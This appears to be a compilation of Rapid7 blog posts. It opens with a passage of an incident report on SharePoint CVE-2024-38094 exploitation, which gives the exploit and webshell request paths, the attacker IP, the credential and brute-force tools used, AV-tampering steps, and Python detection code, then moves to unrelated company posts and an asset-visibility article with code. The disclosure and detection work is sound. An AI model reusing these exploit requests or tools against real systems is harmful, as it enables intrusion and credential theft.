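    print(f"{origin}: administrator logons all local?",
          only_local_logons(SAMPLE_EVENTS, origin, "administrator"))
```

With the constructed data the chain resolves to EXCH01 <- DC01 <- SP01, and SP01 shows only local administrator logons, which is the cue to stop looking at authentication data and start looking at what is exposed on that host.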

Rapid7 reviewed the available SharePoint inetpub (IIS) logs and identified the following GET and POST requests, indicative of CVE-2024-38094 being exploited from the external IP address 18.195.61[.]200:

POST /_vti_bin/client.svc/web/GetFolderByServerRelativeUrl('/BusinessDataMetadataCatalog/')/Files/add(url='/BusinessDataMetadataCatalog/BDCMetadata.bdcm

POST /_vti_bin/DelveApi.ashx/config/ghostfile93.aspx

This vulnerability allows remote code execution (RCE) on systems running Microsoft SharePoint from an external source. The proof-of-concept (PoC) request pattern identified here was observed in the available SharePoint log evidence; a good resource explaining the PoC code on GitHub can be found here. Using this vulnerability, the attacker dropped a webshell on the system named ghostfile93.aspx, which generated numerous HTTP POST requests from the same external IP address tied to the exploit string in the log evidence. After several hours of using the webshell, the attacker authenticated to the system with the local administrator account.
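As an added example (not part of the post or of Rapid7’s tooling), the following script parses W3C-format IIS log lines and flags the two request shapes quoted above: a POST through client.svc that adds a file into the BusinessDataMetadataCatalog folder, and a POST to an .aspx path under DelveApi.ashx. It also counts webshell POSTs per source address so that the “numerous POST requests from one IP” pattern stands out. The log lines are constructed; the attacker address is the one published in the IoC table below, undefanged so the match can be exercised.

```python
"""Flag SharePoint exploitation and webshell traffic in IIS (W3C) logs.

Added example for this post, not Rapid7 tooling. The log lines are constructed;
the attacker address is the one published in the post's IoC table.
"""
import re
from collections import defaultdict

# Source IP from the IoC table (defanged on the page as 18.195.61[.]200).
KNOWN_BAD_IPS = {"18.195.61.200"}

# A file-add call through client.svc into the BDC catalog folder: the request
# shape quoted in the post for CVE-2024-38094.
EXPLOIT_RE = re.compile(
    r"/_vti_bin/client\.svc/web/GetFolderByServerRelativeUrl\(.*?\)/Files/add\(url=",
    re.IGNORECASE,
)
# An .aspx handler under DelveApi.ashx, where the post's webshell lived.
WEBSHELL_RE = re.compile(r"/_vti_bin/DelveApi\.ashx/.*\.aspx$", re.IGNORECASE)

# Constructed log excerpt (internal addresses and user names are invented).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-09-01 01:50:03 10.0.5.20 GET /sites/hr/default.aspx - 443 CORP\\jsmith 10.0.9.5 Mozilla/5.0 200
2024-09-01 01:55:12 10.0.5.20 POST /_vti_bin/client.svc/web/GetFolderByServerRelativeUrl('/BusinessDataMetadataCatalog/')/Files/add(url='/BusinessDataMetadataCatalog/BDCMetadata.bdcm - 443 - 18.195.61.200 Mozilla/5.0 200
2024-09-01 01:56:40 10.0.5.20 POST /_vti_bin/DelveApi.ashx/config/ghostfile93.aspx - 443 - 18.195.61.200 Mozilla/5.0 200
2024-09-01 01:57:02 10.0.5.20 POST /_vti_bin/DelveApi.ashx/config/ghostfile93.aspx - 443 - 18.195.61.200 Mozilla/5.0 200
2024-09-01 01:58:15 10.0.5.20 POST /_vti_bin/DelveApi.ashx/config/ghostfile93.aspx - 443 - 18.195.61.200 Mozilla/5.0 200
2024-09-01 02:01:00 10.0.5.20 GET /_layouts/15/start.aspx - 443 CORP\\adoe 10.0.9.7 Mozilla/5.0 200
"""


def parse_iis_log(text):
    """Parse W3C extended log lines into dicts keyed by the #Fields header."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log data precedes the #Fields header")
        parts = line.split()
        if len(parts) != len(fields):  # malformed line: skip rather than guess
            continue
        records.append(dict(zip(fields, parts)))
    return records


def detect_sharepoint_abuse(records):
    """Return one finding per suspicious request with the reasons it matched."""
    findings = []
    for r in records:
        stem, method, src = r["cs-uri-stem"], r["cs-method"], r["c-ip"]
        reasons = []
        if method == "POST" and EXPLOIT_RE.search(stem):
            reasons.append("bdc_file_write")
        if method == "POST" and WEBSHELL_RE.search(stem):
            reasons.append("aspx_under_delveapi")
        if src in KNOWN_BAD_IPS:
            reasons.append("known_bad_source")
        if reasons:
            findings.append({"time": f'{r["date"]} {r["time"]}', "src": src,
                             "stem": stem, "reasons": reasons})
    return findings


def summarize_by_source(findings):
    """Per source address: first sighting, exploit requests and webshell POSTs."""
    summary = defaultdict(lambda: {"first_seen": None, "exploit_requests": 0, "webshell_posts": 0})
    for f in findings:
        s = summary[f["src"]]
        s["first_seen"] = s["first_seen"] or f["time"]
        if "bdc_file_write" in f["reasons"]:
            s["exploit_requests"] += 1
        if "aspx_under_delveapi" in f["reasons"]:
            s["webshell_posts"] += 1
    return dict(summary)


if __name__ == "__main__":
    hits = detect_sharepoint_abuse(parse_iis_log(SAMPLE_LOG))
    for h in hits:
        print(h["time"], h["src"], ",".join(h["reasons"]), h["stem"][:60])
    print(summarize_by_source(hits))
```

The two regexes match on request shape rather than on the exact string, so a renamed webshell or a different target file name in the BDC folder is still caught; the IoC address is a separate, weaker signal that is only useful for the specific campaign.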

Initial access occurred two weeks before the start of the investigation. During the dwell time the attacker carried out other notable TTPs, using several binaries including everything.exe, kerbrute_windows_amd64.exe, 66.exe, and Certify.exe, and attempting to destroy third-party backups. The binary everything.exe indexes the NTFS file system for efficient searching across files, such as recently used files and network shares. Among the most notable binaries were 66.exe, a renamed copy of Mimikatz, and Certify.exe, which creates an ADFS certificate to use for elevated actions within the Active Directory environment. The remaining binary, kerbrute_windows_amd64.exe, is a tool for brute-forcing Active Directory accounts over Kerberos pre-authentication. The attacker failed to compromise the third-party backup solution but tried multiple methods, including accessing it via the browser with compromised credentials and connecting over SSH.

As discussed above, the installation of an external AV product to disable security tooling was an interesting TTP identified during this investigation. Shortly after the attempted Impacket execution was blocked, Rapid7 identified the attacker running an installation batch script called hrsword install.bat. The contents of this script show that it installs the Huorong AntiVirus (AV) security solution: it creates a service called sysdiag to load the driver file sysdiag_win10.sys and sets up a VBS script execution parameter to launch HRSword.exe. Rapid7 observed this installation causing errors for the security products on the system, potentially leading to a scenario in which the service or application would crash. These install files and all IoCs identified during this investigation are listed in the IoC table in this blog.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to the Microsoft SharePoint CVE-2024-38094 with authenticated vulnerability checks added in the July 09, 2024 content release.

Rapid7 used Velociraptor during this investigation for remote triage and collection of forensic artifacts on the endpoint. A Velociraptor artifact has been created to hunt for strings related to the public PoC and the log evidence identified during the investigation. The artifact can be found in the Rapid7 Labs VQL repo here.

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7’s expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to exploitation of this vulnerability.
Suspicious Commands Launched by Webserver
IIS Launching Discovery Commands
IIS Spawns PowerShell
Attacker Tool – Impacket
Attacker Tool – MimiKatz
Attacker Technique – Hash Dumping With NTDSUtil
Attacker Technique – Clearing Event Logs
Defense Evasion – Disabling Multiple Security or Backup Products

Rapid7 also recommends ensuring that SharePoint is patched to the latest version.

MITRE ATT&CK techniques

Tactic | Technique | Details
Initial Access | Exploit Public-Facing Application (T1190) | CVE-2024-38094: Microsoft SharePoint Remote Code Execution Vulnerability
Defense Evasion | Impair Defenses (T1562) | AV solution used to disable or degrade security tools on systems.
Discovery | Account Discovery (T1087) | Usage of AD enumeration tools
Command and Control | Proxy (T1090) | Fast Reverse Proxy used to establish an outbound connection
Discovery | File and Directory Discovery (T1083) | Everything.exe observed on in-scope systems.
Discovery | Network Share Discovery (T1135) | nxc.exe observed on in-scope systems.
Credential Access | OS Credential Dumping (T1003) | Various credential harvesting tools observed on in-scope systems
Persistence | Scheduled Task/Job (T1053) | Scheduled tasks observed on in-scope systems to execute the FRP tool.

Indicators of Compromise

Attribute | Value | Description
Filename and Path | c:\users\Redacted\documents\everything-1.4.1.1024.x86\everything.exe | Binary to locate files
SHA256 | d3a6ed07bd3b52c62411132d060560f9c0c88ce183851f16b632a99b4d4e7581 | Hash for everything.exe
Filename and Path | c:\programdata\vmware\66.exe | Renamed mimikatz.exe
SHA256 | 61c0810a23580cf492a6ba4f7654566108331e7a4134c968c2d6a05261b2d8a1 | Hash for mimikatz.exe
Filename and Path | c:\programdata\vmware\certify.exe | Creates an ADFS certificate to utilize for elevated actions within the Active Directory environment.
SHA256 | 95cc0b082fcfc366a7de8030a6325c099d8012533a3234edbdf555df082413c7 | Hash for certify.exe
Filename and Path | c:\programdata\vmware\kerbrute_windows_amd64.exe | Used to perform Kerberos pre-auth brute forcing.
SHA256 | d18aa84b7bf0efde9c6b5db2a38ab1ec9484c59c5284c0bd080f5197bf9388b0 | Hash for kerbrute_windows_amd64.exe
Filename and Path | c:\programdata\vmware\msvrp.exe | Fast Reverse Proxy tool for allowing external access to the system through a NAT-configured firewall.
SHA256 | f618b09c0908119399d14f80fc868b002b987006f7c76adbcec1ac11b9208940 | Hash for msvrp.exe
Filename and Path | c:\programdata\vmware\nxc.exe | Newer version of the CrackMapExec network pentesting tool.
SHA256 | 95cc0b082fcfc366a7de8030a6325c099d8012533a3234edbdf555df082413c7 | Hash for nxc.exe
Filename and Path | c:\programdata\vmware\adexplorer64.exe | Active Directory enumeration tool
SHA256 | e451287843b3927c6046eaabd3e22b929bc1f445eec23a73b1398b115d02e4fb | Hash for adexplorer64.exe
Filename and Path | c:\users\Redacted\documents\h\hrsword install.bat | Component of Huorong AV
SHA256 | 1beec8cecd28fdf9f7e0fc5fb9226b360934086ded84f69e3d542d1362e3fdf3 | Hash for hrsword install.bat
Filename and Path | c:\users\Redacted\documents\h\hrsword.exe | Component of Huorong AV
SHA256 | 6ce228240458563d73c1c3cbbd04ef15cb7c5badacc78ce331848f5431b406cc | Hash for hrsword.exe
Filename and Path | c:\Windows\System32\drivers\sysdiag_win10.sys | System driver component of Huorong AV
SHA256 | acb5de5a69c06b7501f86c0522d10fefa9c34776c7535e937e946c6abfc9bbc6 | Hash for sysdiag_win10.sys
Log-Based IOC | POST /_vti_bin/client.svc/web/GetFolderByServerRelativeUrl('/BusinessDataMetadataCatalog/')/Files/add(url='/BusinessDataMetadataCatalog/BDCMetadata.bdcm | PoC code identified in SharePoint logs.
Log-Based IOC | POST /_vti_bin/DelveApi.ashx/config/ghostfile93.aspx | Webshell identified within SharePoint logs.
IP Address | 54.255.89[.]118 | IP address from .ini file for Fast Reverse Proxy tool
IP Address | 18.195.61[.]200 | Source IP address from exploitation and webshell communications

7 Rapid Questions on our Belfast Placement Programme: Orla Magee and Paddy McDermott

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/10/18/7-rapid-questions-on-our-belfast-placement-programme-orla-magee-and-paddy-mcdermott/


Ever wonder what it’s like to be an intern at Rapid7 in Belfast?

Software Engineers Orla Magee and Paddy McDermott share what the interview process looked like for them, along with impactful projects and advice for others exploring Rapid7’s Placement Programme.

What was the interview process like for the Placement Programme?

Paddy: The interview process for Rapid7’s Placement Programme was well structured and welcoming. It consisted of two parts, a one-on-one chat focusing on cultural alignment, and a technical interview with programming questions and a puzzle to solve. The interviewers were approachable, which helped me feel at ease. I felt as though they struck a good balance, assessing my skills without overwhelming me with information and questions. It felt like a genuine attempt to get to know me as a person and assess my skills, rather than just ticking boxes.

Orla: From the start, the talent acquisition team was friendly and communicative, keeping me well-informed about each stage. The interviewers seemed genuinely interested in getting to know me as a person, highlighting that being yourself is crucial in this process. Overall, the interview experience reflected positively on Rapid7’s commitment to finding well-rounded individuals who can contribute both technically and culturally to their team, which made me feel at ease and excited for an opportunity to work at Rapid7.

What initially stood out to you about Rapid7?

Paddy: What stood out to me about Rapid7 was the genuine connection I felt with the people I met during the interview process. The interviewers were engaging and approachable, which gave me a strong sense of the company’s collaborative culture. Another thing that caught my attention was Rapid7’s commitment to growing new talent. This became clear when I attended an event specifically for intern applicants, where I got to experience the company’s welcoming atmosphere firsthand. A mix of friendly people, a learning-focused environment and the opportunity for significant professional growth really made Rapid7 stand out as an ideal place to begin my career.

What was the learning curve like coming into Rapid7 as a student, and what resources or tools did you have to navigate that?

Orla: Transitioning from university to working at Rapid7 as a student came with a significant learning curve. In university, I was used to working independently on projects. At Rapid7, I had to adapt to collaborating as part of a team. This shift required developing my communication skills and learning to work effectively with others. Additionally, the codebase was much bigger and more complex than the smaller-scale projects I had worked on in university. To help navigate these challenges, I was paired with a mentor at the start of my internship, who was instrumental in developing my technical abilities and helping me adjust to working in a professional environment. Alongside my mentor, my team members were always willing to offer assistance and guidance, creating a supportive atmosphere that facilitated my learning and growth. This combination of mentorship and team support was crucial in helping me overcome the learning curve and successfully adapt to a new work environment.

Can you share a memorable project or experience?

Paddy: One of my most memorable achievements during my placement was developing a full-stack status page. This project was particularly significant as it served a real, practical purpose within the company. The status page I created was designed to alert on outages and display the health of various components of our team’s pipeline. This tool was used beyond our team, and was shared internally across different parts of the company. This project allowed me to greatly expand my full-stack development skills in a meaningful way. It was rewarding to see something I built from the ground up being actively used to improve monitoring and communication about our pipeline’s status.

What advice would you give someone looking to land a Placement with Rapid7?

Orla: Take advantage of intern nights, held at the office, as these events offer a unique glimpse into Rapid7’s culture and team dynamics. These events are great opportunities to network and build connections with current staff members, potentially giving you an insider’s perspective on the company.

Paddy: My main advice would be to be yourself throughout the whole process, as this will really help you connect with the interviewers and showcase your true potential. Also, make sure to demonstrate a strong willingness to learn, as Rapid7 values candidates who are eager to grow and take on new challenges.

What were some of your biggest fears coming in, and how did that compare to reality?

Orla: When I started my internship at Rapid7, my main concern was that my technical skills might not measure up to those of my peers. I worried about potentially struggling to contribute meaningfully to the team, but my real experience showed that these worries were unnecessary. From day one, I was met with a welcoming and supportive environment. My colleagues were not only understanding of my position as an intern but were also genuinely enthusiastic about helping me develop my skills. They took the time to walk me through their current projects, providing valuable context and insights that helped me quickly get up to speed. My initial uncertainty was replaced with excitement for the opportunity to learn and contribute, and the reality of the internship far exceeded my expectations.

How has your placement experience prepared you for a successful career?

Paddy: Overall, the placement has given me a mix of technical growth, hands-on experience and professional development creating a strong foundation for my future in tech. I’ve learned many new programming languages with guidance from experienced colleagues. Working in a live production environment has equipped me with real-world skills and experiences. Presenting demos has boosted my confidence in public speaking and taught me how to communicate technical concepts effectively. I’ve built connections and friendships with coworkers which has made the work environment enjoyable and allowed me to start to form a professional network that will be valuable in my career.

Interested in learning more about the Placement Programme, or additional emerging talent programmes at Rapid7? Click here to explore our offerings and view open jobs.

Root Access for Data Control: A DEF CON IoT Village Story

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/10/16/root-access-for-data-control-a-def-con-iot-village-story/


Every year, Rapid7 is a presenter at DEF CON’s IoT Village, sharing in-depth insight and expertise into the hacking of all things Internet of Things. This year, our perennial IoT hacking presenter, Principal Security Researcher, IoT, Deral Heiland, along with Rapid7 pentest team members, showed attendees many methods of extracting firmware from IoT devices and manipulating the systems in the name of control and operations.

Extracting firmware without the use of destructive means can be difficult and in some cases impossible. However, Deral went deep with IoT Village attendees, presenting a live hands-on exercise each attendee in the room could interact with. It was an enlightening and productive presentation. But we are aware not everyone could make it to DEF CON 32 this year.

That is why we’ve transformed the presentation into a handy whitepaper. Deral has gone step by step through the exercise, and has even improved on it in places (so even if you were in the room, there is likely more for you to get from it). While DEF CON 32 may be firmly in the rear-view mirror, the hacking carries on. If you missed DEF CON, or Deral’s presentation, you have another chance to learn and take part in the exercise.

To check out the whitepaper, please click here. And if you’d like to learn more about Deral’s previous IoT Village presentations (he’s done a lot of them), many live right here on the blog.

Test Driving a New Benefit Programme in Belfast

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/10/16/test-driving-a-new-benefit-programme-in-belfast/


When most people think about benefits packages at work, what typically comes to mind are things like healthcare programmes, financial stipends, or wellbeing incentives. For Stephen, one benefit he uses on a daily basis comes on four wheels.

Rapid7’s electric vehicle scheme was rolled out in late 2023 for Belfast employees. The programme enables employees to lease an electric car via their employer and pay for it on a salary sacrifice basis, offering substantial tax and national insurance savings.

“I kept reading about the program and thinking – is it really this simple? What’s the catch?” said Stephen Gallagher, a Lead Product Manager who received his new electric BMW this past May. “The more I learned about the process and understood what that pre-tax payment would be vs. paying for a vehicle on my own, it was really a no-brainer.”

The unique offering also contributes to the company’s sustainability goals by making electric vehicles more accessible, thanks to the pre-tax salary sacrifice. “I’ve worked for some other big tech companies in Belfast, but I’ve never seen this as a company offering. It definitely gives me a great sense of pride to work for Rapid7, and I feel motivated to do well for a company that takes care of employees in such a unique way.”


“The program provides employees with make and model options based on different salary levels to ensure the monthly payment is reasonable. Once an employee enrolls and selects a vehicle, our vendor sources it and coordinates delivery. Employees don’t pay anything until the vehicle is delivered,” says Karen Hendry, Senior Benefits Manager. “I’ve watched employees go through the process, and I’m excited to have just taken ownership of a car myself through the programme!”

In addition to a competitive monthly payment, the program also eliminates down payments, dealer fees, maintenance costs, and separate insurance fees, as the offering is all-inclusive. Stephen shared more on his recent experience: “I recently got a scratch on the car, so it’s been in the shop to get repaired. All I had to do was reach out to our vendor, and they got me in touch with a repair shop and coordinated everything for me.”

“As a benefits team, we are always evaluating our offerings and looking for ways to bring value to our employees through unique programmes. It’s exciting to see something new like this take off successfully in Belfast.”

Learn more about Rapid7 in Belfast here.

Proactive Visibility Is Foundational to Strong Cybersecurity

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/09/30/proactive-visibility-is-foundational-to-strong-cybersecurity/


Authored by Guest IDC Blogger: Michelle Abraham

Exposures are more than CVEs, so organizations need to move beyond the traditional thinking of vulnerability management to a holistic view. Part of that view must be greater visibility into devices, users, applications, and all the digital infrastructure connected to an organization’s environment. Gaps in that view create risk exposure. Organizations must proactively identify anything that presents a risk to determine whether to act.

Solutions that improve visibility discover assets, aggregate all asset data in one place, and enrich that data to understand the relationships between users, assets, and applications. These cybersecurity asset management systems connect to other security tools in the IT environment to gather their telemetry on what they see and the communications they have. The data from these connections can overlap and be duplicative, so the system needs to deduplicate the data to render it useful for security.
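To make the aggregation-and-deduplication step concrete, here is an added example (not from the post, IDC, or any Rapid7 product) that merges asset records from three hypothetical tool feeds. It normalizes MAC addresses and hostnames, links records that share a MAC or short hostname (falling back to IP only when a record has neither), unions chains of partial matches into one asset, and reports which merged assets are missing from a given source such as the CMDB. All feed names, hosts and addresses are constructed.

```python
"""Merge asset records from several tools into one deduplicated inventory.

Added example for this post; the feeds and tool names are constructed and do
not represent any real product's output.
"""
import re

# Constructed feeds. Note the inconsistent hostname case, FQDN vs short name,
# and MAC formatting, which is exactly what deduplication has to cope with.
EDR_FEED = [
    {"hostname": "WEB-01.corp.example", "ip": "10.0.5.20", "mac": "00:1A:2B:3C:4D:5E", "os": "Windows Server 2019"},
    {"hostname": "db-02", "ip": "10.0.5.40", "mac": "00:1a:2b:3c:4d:60", "os": "Ubuntu 22.04"},
]
SCANNER_FEED = [
    {"hostname": "web-01", "ip": "10.0.5.20", "mac": "00-1A-2B-3C-4D-5E", "open_ports": [443]},
    {"hostname": "", "ip": "10.0.5.99", "mac": "", "open_ports": [22]},  # seen only by the scanner
]
CMDB_FEED = [
    {"hostname": "DB-02.corp.example", "owner": "dba-team", "criticality": "high"},
]


def normalize_mac(mac):
    """Lower-case, colon-separated form, or None if the value is not a MAC."""
    if not mac:
        return None
    digits = re.sub(r"[^0-9a-f]", "", mac.lower())
    if len(digits) != 12:
        return None
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def short_host(name):
    """Short hostname in lower case, so FQDN and NetBIOS forms compare equal."""
    if not name:
        return None
    return name.strip().lower().split(".")[0] or None


def record_keys(rec):
    """Identity keys for a record. MAC and short hostname are strong; IP is
    used only as a fallback because addresses get reassigned."""
    keys = []
    mac = normalize_mac(rec.get("mac"))
    if mac:
        keys.append(("mac", mac))
    host = short_host(rec.get("hostname"))
    if host:
        keys.append(("host", host))
    if not keys and rec.get("ip"):
        keys.append(("ip", rec["ip"]))
    return keys


def merge_assets(feeds):
    """feeds: {source_name: [record, ...]}. Records sharing any identity key are
    united (union-find), so a chain of partial matches still forms one asset."""
    records = [(src, rec) for src, recs in feeds.items() for rec in recs]
    parent = list(range(len(records)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]  # path halving
            i = parent[i]
        return i

    seen = {}  # identity key -> first record index that carried it
    for i, (_, rec) in enumerate(records):
        for key in record_keys(rec):
            if key in seen:
                parent[find(i)] = find(seen[key])
            else:
                seen[key] = i

    assets = {}
    for i, (src, rec) in enumerate(records):
        asset = assets.setdefault(find(i), {"sources": set(), "attributes": {}})
        asset["sources"].add(src)
        for k, v in rec.items():
            if v not in (None, "", []) and k not in asset["attributes"]:
                asset["attributes"][k] = v  # first source to supply a field wins
    return list(assets.values())


def missing_from_source(assets, source):
    """Assets that `source` has no record of, e.g. hosts absent from the CMDB."""
    return [a for a in assets if source not in a["sources"]]


if __name__ == "__main__":
    inventory = merge_assets({"edr": EDR_FEED, "scanner": SCANNER_FEED, "cmdb": CMDB_FEED})
    for a in inventory:
        print(sorted(a["sources"]), a["attributes"])
    print("not in CMDB:", len(missing_from_source(inventory, "cmdb")))
```

Field precedence here is first-source-wins, which is a simplification; a real system would rank sources per attribute (for example the EDR for OS, the CMDB for owner) and keep provenance per field so that conflicts can be surfaced rather than silently resolved.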

Attack surface management (ASM) adds to the visibility by showing an external view of the digital estate, allowing security teams to see the view attackers have from outside their environment. Attack surfaces have expanded rapidly and often involve a hybrid multicloud environment and SaaS applications, including GenAI. Identifying unknown internet-exposed assets that provide a pathway to critical data is essential to managing risk.

Knowing what constitutes the environment that must be secured should be the foundation upon which the rest is built. Discovering only part of an organization’s shadow IT addresses a portion of the problem but does not solve it. Conversely, investigating assets that are falsely attributed to an organization wastes time. It is common for organizations to find 15%–30% more assets when they adopt security tooling for asset discovery.

Solutions need to bring together many sources of data — both first- and third-party, internal and external views of the environment — into a single source of truth about an organization’s digital estate. The assets must include both cloud and on-premises resources to optimize the organization’s security posture for its risk tolerance level. Solutions should also be capable of discovering unknown users and the unsanctioned use of IT resources and applications, which are additional risk exposures. The addition of threat and vulnerability intelligence helps security teams understand the exploitability of each exposure so the most critical issues can be prioritized for remediation.

The flow of information from these tools requires continuous updating because threat actors can seize on any gap, whether recent or present from the beginning. The data shown should include asset configuration and asset criticality in the context of the business, such as whether the asset supports key business applications or has access to sensitive datasets. Knowing who owns an asset is also vital information so that security and IT know who is responsible for fixing a problem when it arises, particularly if ownership resides outside these two areas. Asset ownership will drive accountability for remediation programs and campaigns.
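The aggregation, deduplication and enrichment described in the preceding paragraphs, as an added Python example that is not code from the post or from Rapid7: it merges constructed records from three made-up sources (an endpoint agent, a cloud inventory and an external scan) into one asset list by linking any shared identifier, attaches ownership and criticality from a constructed CMDB, and adds a simple additive risk score that weighs exploitability, internet exposure, end-of-life status and certificate expiry. All hostnames, addresses, score weights and the CVE-EXAMPLE placeholders are assumptions.

```python
from collections import defaultdict
from typing import Dict, List, Optional

# Constructed sample telemetry: hostnames, IPs, MACs and CVE ids are made up.
EDR_INVENTORY = [  # internal view from an endpoint agent
    {"hostname": "WEB01.corp.example", "mac": "AA:BB:CC:00:11:22", "os_eol": False},
    {"hostname": "db01.corp.example", "mac": "aa-bb-cc-00-11-33", "os_eol": True},
]
CLOUD_INVENTORY = [  # internal view from the cloud provider's inventory API
    {"instance_id": "i-0abc", "hostname": "web01", "public_ip": "203.0.113.10"},
    {"instance_id": "i-0def", "hostname": "batch07", "public_ip": None},
]
ASM_SCAN = [  # external view: what an unauthenticated observer can reach
    {"public_ip": "203.0.113.10", "open_ports": [443], "cert_days_left": 12},
]
CMDB = {  # business context keyed by short hostname
    "web01": {"owner": "web-team", "criticality": "high"},
    "db01": {"owner": "dba-team", "criticality": "critical"},
}
VULNS = [  # scanner findings with an exploitability flag from threat intel
    {"hostname": "web01", "cve": "CVE-EXAMPLE-0001", "known_exploited": True},
    {"hostname": "batch07", "cve": "CVE-EXAMPLE-0002", "known_exploited": False},
]
CRITICALITY_WEIGHT = {"critical": 4, "high": 3, "medium": 2, "low": 1, "unknown": 0}


def short_host(h: Optional[str]) -> Optional[str]:
    """Map 'WEB01.corp.example' and 'web01' to the same key."""
    return h.split(".")[0].lower() if h else None

# Fields that can tie two tools' records together, with their normalisers.
ID_FIELDS = {"hostname": ("host:", short_host),
             "mac": ("mac:", lambda m: m.replace("-", ":").lower()),
             "public_ip": ("ip:", str), "instance_id": ("inst:", str)}

def record_keys(rec: dict) -> List[str]:
    return [pre + fn(rec[f]) for f, (pre, fn) in ID_FIELDS.items() if rec.get(f)]

class DisjointSet:
    """Union-find over identifiers: records sharing any key (transitively) are one asset."""
    def __init__(self) -> None:
        self.parent: Dict[str, str] = {}

    def find(self, x: str) -> str:
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]  # path halving
            x = self.parent[x]
        return x

    def union(self, a: str, b: str) -> None:
        self.parent[self.find(a)] = self.find(b)

def enrich(asset: dict) -> dict:
    """Attach owner, criticality and vulnerabilities; compute an additive risk score."""
    asset.update(CMDB.get(asset["hostname"], {"owner": "unassigned", "criticality": "unknown"}))
    asset["vulns"] = [v for v in VULNS if short_host(v["hostname"]) == asset["hostname"]]
    score = CRITICALITY_WEIGHT[asset["criticality"]]
    score += 3 if asset["internet_exposed"] else 0  # reachable from outside
    score += sum(4 if v["known_exploited"] else 1 for v in asset["vulns"])
    score += 2 if asset["os_eol"] else 0  # vendor no longer ships patches
    if asset["cert_days_left"] is not None and asset["cert_days_left"] < 30:
        score += 2  # certificate about to expire
    asset["risk_score"] = score
    return asset

def build_inventory() -> List[dict]:
    """Deduplicate records across tools, merge their fields, enrich and rank."""
    records = ([("edr", r) for r in EDR_INVENTORY] + [("cloud", r) for r in CLOUD_INVENTORY]
               + [("asm", r) for r in ASM_SCAN])
    ds = DisjointSet()
    for _, rec in records:  # pass 1: link every identifier a record carries
        keys = record_keys(rec)
        for k in keys[1:]:
            ds.union(keys[0], k)
    groups: Dict[str, list] = defaultdict(list)  # pass 2: group by root identifier
    for source, rec in records:
        groups[ds.find(record_keys(rec)[0])].append((source, rec))
    assets = []
    for members in groups.values():
        asset = {"hostname": None, "sources": set(), "identifiers": set(),
                 "internet_exposed": False, "os_eol": False, "cert_days_left": None}
        for source, rec in members:
            asset["sources"].add(source)
            asset["identifiers"].update(record_keys(rec))
            if rec.get("hostname"):
                asset["hostname"] = short_host(rec["hostname"])
            if source == "asm":  # only the external scanner proves internet exposure
                asset["internet_exposed"] = True
                asset["cert_days_left"] = rec.get("cert_days_left")
            asset["os_eol"] = asset["os_eol"] or bool(rec.get("os_eol"))
        assets.append(enrich(asset))
    return sorted(assets, key=lambda a: a["risk_score"], reverse=True)

if __name__ == "__main__":
    for a in build_inventory():
        print(a["risk_score"], a["hostname"], a["owner"], sorted(a["sources"]))
```

The union-find step is what makes the deduplication transitive: the endpoint agent and the external scanner share no identifier directly, but each shares one with the cloud inventory record, so all three collapse into a single asset that is known to be internet-exposed, owned by a named team, and carrying an exploited vulnerability. The score weights are arbitrary illustrations; a real deployment would derive them from the organization's own risk tolerance.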

With a bi-directional connection to the configuration management database (CMDB), a solution that combines Cyber Asset Attack Surface Management (CAASM) and ASM further aligns the entire organization with the most updated information. It augments the CMDB to help with asset lifecycle management because end-of-life devices that no longer receive updates pose a risk. Systems should also be able to track and report on additional exposures, such as expiring certificates or unknown certificate issuers.

A map of asset and user relationships helps visualize the paths an attacker could take through the network, moving laterally toward the organization’s crown jewels. CAASM and ASM output must be more than a dump of data from various tools; the data must be easy to query and yield actionable insights that help the organization reduce risk. Correlating the data from these sources gives teams responding to a threat complete context about the affected assets, which aids investigation and remediation. Remediation is easier still when the solution offers recommended actions and integrates with ticketing systems or automation platforms that notify asset owners of issues and track the status of each patch or mitigation.
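The relationship map and path analysis described above, as an added Python example that is not code from the post or from Rapid7: it uses a constructed graph of hosts and accounts (all names made up) in which an edge means that control of one node grants reach to the next, enumerates the paths from internet-exposed assets to a crown-jewel database, ranks the intermediate nodes by how many paths pass through them so remediation can target the node whose fix severs the most paths, and recomputes the paths after a modelled fix.

```python
from collections import Counter, defaultdict
from typing import Dict, List, Set, Tuple

# Constructed relationship map (made-up names). A directed edge (a, b) means
# "whoever controls a can reach b": a host runs as a service account, an
# account can log on to a host, a host caches another account's credentials.
EDGES: List[Tuple[str, str]] = [
    ("web01", "svc-web"),      # web server process runs as svc-web
    ("svc-web", "app01"),      # svc-web has a logon right on app01
    ("svc-web", "jump01"),     # ...and on the jump host
    ("app01", "svc-app"),
    ("svc-app", "db01"),       # the app tier's account reaches the database
    ("vpn-gw", "alice"),       # VPN gateway sessions authenticate as alice
    ("alice", "jump01"),
    ("jump01", "admin-bob"),   # jump host holds cached credentials for admin-bob
    ("admin-bob", "db01"),
    ("admin-bob", "fileshare"),
]
INTERNET_EXPOSED = {"web01", "vpn-gw"}   # from the external (ASM) view
CROWN_JEWELS = {"db01"}                  # business-critical data store


def build_graph(edges) -> Dict[str, Set[str]]:
    adj: Dict[str, Set[str]] = defaultdict(set)
    for a, b in edges:
        adj[a].add(b)
    return adj


def attack_paths(adj, sources, targets, max_depth: int = 8) -> List[List[str]]:
    """Enumerate simple paths from any exposed node to any crown jewel."""
    found: List[List[str]] = []

    def dfs(node: str, path: List[str]) -> None:
        if node in targets:
            found.append(list(path))
            return
        if len(path) > max_depth:
            return
        for nxt in sorted(adj.get(node, ())):
            if nxt not in path:  # simple paths only, no cycles
                path.append(nxt)
                dfs(nxt, path)
                path.pop()

    for s in sorted(sources):
        dfs(s, [s])
    return found


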